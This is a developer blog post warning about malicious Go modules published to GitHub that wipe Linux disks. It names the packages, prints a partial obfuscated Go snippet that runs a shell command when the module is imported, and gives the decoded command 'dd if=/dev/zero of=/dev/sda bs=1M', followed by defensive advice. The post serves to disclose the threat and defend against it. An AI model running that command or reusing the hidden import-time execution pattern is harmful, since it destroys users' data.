![[The AI Show Episode 145]: OpenAI Releases o3 and o4-mini, AI Is Causing “Quiet Layoffs,” Executive Order on Youth AI Education & GPT-4o’s Controversial Update](https://www.marketingaiinstitute.com/hubfs/ep%20145%20cover.png)
![Ditching a Microsoft Job to Enter Startup Purgatory with Lonewolf Engineer Sam Crombie [Podcast #171]](https://cdn.hashnode.com/res/hashnode/image/upload/v1746753508177/0cd57f66-fdb0-4972-b285-1443a7db39fc.png?#)
.jpeg?#)
.jpg?#)
_designer491_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![Apple Shares New 'Mac to School' Ads: Pointed, Mirrored, Dropped In [Video]](https://www.iclarified.com/images/news/97295/97295/97295-640.jpg)
![Apple Drops New Trailer for 'F1' Starring Brad Pitt [Video]](https://www.iclarified.com/images/news/97296/97296/97296-640.jpg)
![Apple iPhone Exports From India Surge 116% [Report]](https://www.iclarified.com/images/news/97292/97292/97292-640.jpg)
![Apple Shares 'Last Scene' Short Film Shot on iPhone 16 Pro [Video]](https://www.iclarified.com/images/news/97289/97289/97289-640.jpg)
Don’t Run That Go Module: The Malware That Wipes Your Linux Disk
Recently, malicious software was discovered in Go packages hosted on GitHub. This malware has the ability to completely destroy your Linux system. Let's look at what happened and how we can protect ourselves. What Happened? In April 2025, a supply chain attack targeted the Go ecosystem. Attackers published fake but convincing modules with malicious code to GitHub: github.com/truthfulpharm/prototransform github.com/blankloggia/go-mcp github.com/steelpoor/tlsproxy The attackers carefully crafted these package names to appear trustworthy at a glance, significantly increasing the chance of accidental inclusion in real development projects. Once the malicious code is activated, it executes commands that systematically write zeroes across** every byte of the primary storage device**, making data recovery nearly impossible. To hide the malicious intent, the attackers used a technique called obfuscation, as seen in the code snippet below: func eGtROk() error { DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "..."} pBRPhsxN := runtime.GOOS == "linux" bcbGOM := "/bin/sh" vpqIU := "-c" PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + ... if pBRPhsxN { exec.Command(bcbGOM, vpqIU, PWcf).Start() } return nil } var GEeEQNj = eGtROk() When imported and executed, this code runs a destructive Bash command: dd if=/dev/zero of=/dev/sda bs=1M Why Is This So Dangerous? This is not a vulnerability — it’s destructive malware. The malicious payload is hidden inside Go code with deceptively legitimate module names. It targets Linux systems only, checking the OS before executing. How Can You Stay Safe as a Go Developer? Always verify module sources: Use official sources or verified maintainers. Random GitHub modules with few stars or forks should raise red flags. Run govulncheck regularly: Go’s official vulnerability scanner helps detect known issues. go install golang.org/x/vuln/cmd/govulncheck@latest govulncheck ./... Scan your dependencies with external tools: Tools like OSV-Scanner or Dependabot can help detect dangerous packages early. Have Thoughts or Questions? If you have suggestions or questions, feel free to drop a comment. Thanks for reading — stay safe! References cybersecuritynews.com/hackers-weaponizing-go-modules go.dev/doc/tutorial/govulncheck
Recently, malicious software was discovered in Go packages hosted on GitHub. This malware has the ability to completely destroy your Linux system. Let's look at what happened and how we can protect ourselves.
What Happened?
In April 2025, a supply chain attack targeted the Go ecosystem. Attackers published fake but convincing modules with malicious code to GitHub:
The attackers carefully crafted these package names to appear trustworthy at a glance, significantly increasing the chance of accidental inclusion in real development projects.
Once the malicious code is activated, it executes commands that systematically write zeroes across** every byte of the primary storage device**, making data recovery nearly impossible.
To hide the malicious intent, the attackers used a technique called obfuscation, as seen in the code snippet below:
func eGtROk() error {
DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "..."}
pBRPhsxN := runtime.GOOS == "linux"
bcbGOM := "/bin/sh"
vpqIU := "-c"
PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + ...
if pBRPhsxN {
exec.Command(bcbGOM, vpqIU, PWcf).Start()
}
return nil
}
var GEeEQNj = eGtROk()
When imported and executed, this code runs a destructive Bash command:
dd if=/dev/zero of=/dev/sda bs=1M
Why Is This So Dangerous?
- This is not a vulnerability — it’s destructive malware.
- The malicious payload is hidden inside Go code with deceptively legitimate module names.
- It targets Linux systems only, checking the OS before executing.
How Can You Stay Safe as a Go Developer?
- Always verify module sources: Use official sources or verified maintainers. Random GitHub modules with few stars or forks should raise red flags.
- Run govulncheck regularly: Go’s official vulnerability scanner helps detect known issues.
go install golang.org/x/vuln/cmd/govulncheck@latest
govulncheck ./...
- Scan your dependencies with external tools: Tools like OSV-Scanner or Dependabot can help detect dangerous packages early.
Have Thoughts or Questions?
If you have suggestions or questions, feel free to drop a comment.
Thanks for reading — stay safe!
References
cybersecuritynews.com/hackers-weaponizing-go-modules
go.dev/doc/tutorial/govulncheck
